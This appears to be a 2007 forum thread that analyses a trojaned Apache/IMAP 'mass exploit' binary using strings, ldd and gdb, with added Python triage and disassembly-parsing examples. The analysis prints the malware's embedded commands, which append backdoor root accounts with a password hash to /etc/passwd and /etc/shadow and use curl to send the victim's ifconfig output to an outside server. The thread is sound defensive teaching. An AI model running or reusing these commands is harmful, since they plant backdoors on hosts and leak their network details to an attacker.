
Watch what you trust.


evilghost
08-28-07, 11:56 AM
This event struck me as unusual so I wanted to share with you why it's normal to be paranoid.

While reading up on my RSS security feeds I found a notification about exploitation of Apache/IMAP, with a link on Security Focus.

http://www.securityfocus.com/archive/1/477926/30/0/threaded

The grammatical structure of the message appears odd, to say the least. Checking out the site, there are two gzipped tarballs available for download. One includes the source code as well as a binary; the other is just precompiled binaries.

I wanted to show you how you can use the 'strings' command and 'ldd' to find information about an executable. Before you run an untrusted executable, especially as root, you better know for darn sure what it is.

ldd will list the libraries a dynamic executable is compiled against; in this case, the executable wasn't statically compiled.

luser@meowbox:~/Desktop$ ldd massxpl
linux-gate.so.1 => (0xffffe000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e10000)
/lib/ld-linux.so.2 (0xb7f4f000)


Now, look what strings has to say:


luser@meowbox:~/Desktop$ strings massxpl
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
recv
connect
snprintf
fgets
puts
getuid
system
socket
select
send
strstr
bcopy
memset
gethostbyname
fclose
getpeername
htons
exit
fopen
_IO_stdin_used
__libc_start_main
fcntl
GLIBC_2.1
GLIBC_2.0
PTRh
Mass Xploitz for Apache and Imap
Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL
Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3
Attacking IMAP server on %s...
Press CTRL+C if you want to skip exploit
./xpl/imapfc3 -h %s
Attacking apache server on %s...
./xpl/apache -t 0 -h %s
perl ./xpl/apache.pl %s 1
./xpl/apache -t 1 -h %s
perl ./xpl/apache.pl %s 2
./xpl/apache -t 2 -h %s
perl ./xpl/apache.pl %s 3
./xpl/apache -t 3 -h %s
socket creation error
can not find host
[ %s ] Port %d (TCP) tertutup
[ %s ] Port %d (TCP) terbuka
Checking for banner...
HEAD / HTTP/1.1
Host:%s
pache
IMAP4rev1
Root priviledge is needed - use your root user OK!
target.txt
Rename your target list filename to target.txt
/etc/shadow
newbie:$1$nLv4Q0aJ$rV4IkBgFH1NMo/HzHX35u/
echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadowecho newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow
echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd
echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd
/usr/bin/curl
/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null
Trying to connect to %s port %d


As you can plainly see, the binary wants you to run it as root. When you do, it adds two new users to your /etc/shadow file (newbie and toor) and then to your /etc/passwd file. It then connects to an HTTP server using curl and reports your IP addresses so the malware author can then come back and connect to you. (http://www.trancefix.org/hell/save.php)

This is poor-quality code. Several assumptions are made: that curl exists on the system and that ifconfig will return a non-IANA-reserved address.

Either way, this should serve as a wake-up call: malware authors are everywhere, and they're actively trying to compromise your box. If you're not taking the necessary caution, you'll get owned.

Even if you don't know C, read the source code; unless it's marvelously obfuscated, you should be able to pick out oddities. Don't trust precompiled binaries from untrusted sources.
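
As an added example (mine, not code from the post or from the tarball): a small Python triage that does what strings(1) does, pulling printable runs out of a file, and then flags the kinds of strings evilghost found above. The byte blob is constructed here to stand in for the binary; the indicator list and MIN_LEN are my choices.

```python
import re

# Constructed sample blob: a fake "binary" with a few strings of the kind seen
# in the thread embedded between non-printable bytes. Not the real file.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"libc.so.6\x00system\x00getuid\x00"
    + b"/etc/shadow\x00"
    + b"echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd\x00"
    + b"/usr/bin/curl -d \"target=$(ifconfig -a)\" http://example.invalid/save.php\x00"
    + b"\x90\x90\xcc\x00Checking for banner...\x00"
)

MIN_LEN = 4  # strings(1) also defaults to 4 printable characters

def extract_strings(data: bytes, min_len: int = MIN_LEN) -> list:
    """Return runs of printable ASCII at least min_len bytes long, like strings(1)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

# Indicators worth a closer look before running an unknown binary (my list).
INDICATORS = {
    "touches account database": re.compile(r">>\s*/etc/(passwd|shadow)|/etc/shadow"),
    "spawns a shell via libc": re.compile(r"^system$"),
    "checks for root": re.compile(r"^getuid$|root", re.IGNORECASE),
    "outbound HTTP beacon": re.compile(r"\bcurl\b|https?://"),
    "collects host network info": re.compile(r"ifconfig"),
}

def triage(data: bytes) -> dict:
    """Map each indicator name to the extracted strings that matched it."""
    found = {}
    for s in extract_strings(data):
        for name, pat in INDICATORS.items():
            if pat.search(s):
                found.setdefault(name, []).append(s)
    return found

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_BINARY).items():
        print(f"[!] {name}")
        for h in hits:
            print(f"      {h}")
```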

spaceigg
08-28-07, 12:11 PM
Interesting. Thanks for educating us.

evilghost
08-28-07, 12:13 PM
You can also use gdb (GNU Debugger) to analyze the executable.

Run "gdb"
Type "file /path/to/massxpl"
Type "disass main" to run the disassembler on the application

Look for the movl calls; they occur around 0x80494e0 and 0x8049534.

Type "x/s [address]" and you'll see:


(gdb) x/s 0x80494e0
0x80494e0 <__dso_handle+816>: "echo toor:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>: "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"

evilghost
08-28-07, 12:21 PM
When disassembling, these are the things to look for; note the system calls:


0x08048feb <main+262>: call 0x8048628 <system@plt>
0x08048ff0 <main+267>: movl $0x8049534,(%esp)
0x08048ff7 <main+274>: call 0x8048628 <system@plt>
0x08048ffc <main+279>: movl $0x8049588,(%esp)
0x08049003 <main+286>: call 0x8048628 <system@plt>
0x08049008 <main+291>: movl $0x80495bc,(%esp)
0x0804900f <main+298>: call 0x8048628 <system@plt>
0x08049014 <main+303>: movl $0x8049468,0x4(%esp)


And now, what they do:


(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>: "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>: "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049588
0x8049588 <__dso_handle+984>: "echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd"
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>: "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x804960c
0x804960c <__dso_handle+1116>: "/usr/bin/curl -d \"user=newbie&pass=novice&target=$(ifconfig -a)\" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null"
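
Added example, not part of the post: a parser for gdb's AT&T-syntax output that pairs each call to system@plt with the immediate last stored at (%esp) before it (the first argument under the 32-bit cdecl convention), so you know which addresses to hand to x/s. The input is the excerpt above plus a few constructed lines (the movl before the first call, a printf call, and a final system call with no visible immediate) to exercise both edge cases.

```python
import re
from typing import List, Optional, Tuple

# The gdb excerpt from the post, plus constructed lines at the start and end
# (the first movl, the printf call, and a system call whose argument is not
# a visible immediate) so the parser's edge cases are exercised.
DISASM = """\
0x08048fe4 <main+255>: movl $0x80494e0,(%esp)
0x08048feb <main+262>: call 0x8048628 <system@plt>
0x08048ff0 <main+267>: movl $0x8049534,(%esp)
0x08048ff7 <main+274>: call 0x8048628 <system@plt>
0x08048ffc <main+279>: movl $0x8049588,(%esp)
0x08049003 <main+286>: call 0x8048628 <system@plt>
0x08049008 <main+291>: movl $0x80495bc,(%esp)
0x0804900f <main+298>: call 0x8048628 <system@plt>
0x08049014 <main+303>: movl $0x8049468,0x4(%esp)
0x0804901b <main+310>: call 0x8048688 <printf@plt>
0x08049020 <main+315>: call 0x8048628 <system@plt>
"""

# Only a store to (%esp) itself is the first argument; 0x4(%esp) is the second.
MOV_FIRST_ARG = re.compile(r"movl\s+\$(0x[0-9a-f]+),\(%esp\)\s*$")
CALL = re.compile(r"call\s+0x[0-9a-f]+\s+<([\w@]+)>")

def find_system_args(disasm: str, callee: str = "system@plt") -> List[Tuple[str, Optional[str]]]:
    """Return (call_address, argument_address) for every call to `callee`.
    argument_address is None when no immediate was stored at (%esp) since the
    previous call, i.e. the command string is built elsewhere and needs a look."""
    pending = None
    results = []
    for line in disasm.splitlines():
        m = MOV_FIRST_ARG.search(line)
        if m:
            pending = m.group(1)
            continue
        m = CALL.search(line)
        if m:
            if m.group(1) == callee:
                results.append((line.split()[0], pending))
            pending = None  # a later call must store its own first argument
    return results

def gdb_commands(disasm: str) -> List[str]:
    """The x/s commands to run next, one per resolvable system() argument."""
    return [f"x/s {addr}" for _, addr in find_system_args(disasm) if addr]

if __name__ == "__main__":
    for call_at, arg in find_system_args(DISASM):
        print(call_at, "system(", arg or "<argument not an immediate>", ")")
```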

evilghost
08-28-07, 01:14 PM
You can also use gdb to list the functions of the program and then disassemble and inspect certain aspects of that function.


(gdb) info functions
All defined functions:

Non-debugging symbols:
0x080485d0 _init
0x080485f8 close@plt
0x08048608 select@plt
0x08048618 bcopy@plt
0x08048628 system@plt
0x08048638 puts@plt
0x08048648 getpeername@plt
0x08048658 fgets@plt
0x08048668 strstr@plt
0x08048678 __libc_start_main@plt
0x08048688 printf@plt
0x08048698 getuid@plt
0x080486a8 fcntl@plt
0x080486b8 fclose@plt
0x080486c8 snprintf@plt
0x080486d8 gethostbyname@plt
0x080486e8 exit@plt
0x080486f8 send@plt
0x08048708 htons@plt
0x08048718 memset@plt
---Type <return> to continue, or q <return> to quit---
0x08048728 connect@plt
0x08048738 fopen@plt
0x08048748 recv@plt
0x08048758 socket@plt
0x08048768 __gmon_start__@plt
0x08048780 _start
0x080487a4 call_gmon_start
0x080487d0 __do_global_dtors_aux
0x08048800 frame_dummy
0x08048824 promosi
0x08048850 imapattack
0x080488a7 apacheattack
0x08048ac8 ctimeout
0x08048ca0 bannertest
0x08048ee5 main
0x08049104 __libc_csu_fini
0x0804910c __libc_csu_init
0x08049160 __do_global_ctors_aux
0x0804918c _fini
(gdb) disass fopen
No symbol table is loaded. Use the "file" command.
(gdb) disass fopen\@plt
No symbol table is loaded. Use the "file" command.
(gdb) disass promosi
Dump of assembler code for function promosi:
0x08048824 <promosi+0>: push %ebp
0x08048825 <promosi+1>: mov %esp,%ebp
0x08048827 <promosi+3>: sub $0x8,%esp
0x0804882a <promosi+6>: movl $0x80491b4,(%esp)
0x08048831 <promosi+13>: call 0x8048638 <puts@plt>
0x08048836 <promosi+18>: movl $0x80491d8,(%esp)
0x0804883d <promosi+25>: call 0x8048638 <puts@plt>
0x08048842 <promosi+30>: movl $0x8049218,(%esp)
0x08048849 <promosi+37>: call 0x8048638 <puts@plt>
0x0804884e <promosi+42>: leave
0x0804884f <promosi+43>: ret
End of assembler dump.
(gdb) x/s 0x80491d8
0x80491d8 <__dso_handle+40>: "Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL"
(gdb) x/s 0x8049218
0x8049218 <__dso_handle+104>: "Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3\n\n"
(gdb)

wnd
09-04-07, 06:31 AM
Somehow your post reminded me of Ken Thompson's article "Reflections on Trusting Trust" (http://cm.bell-labs.com/who/ken/trust.html). "The moral is obvious. You can't trust code that you did not totally create yourself."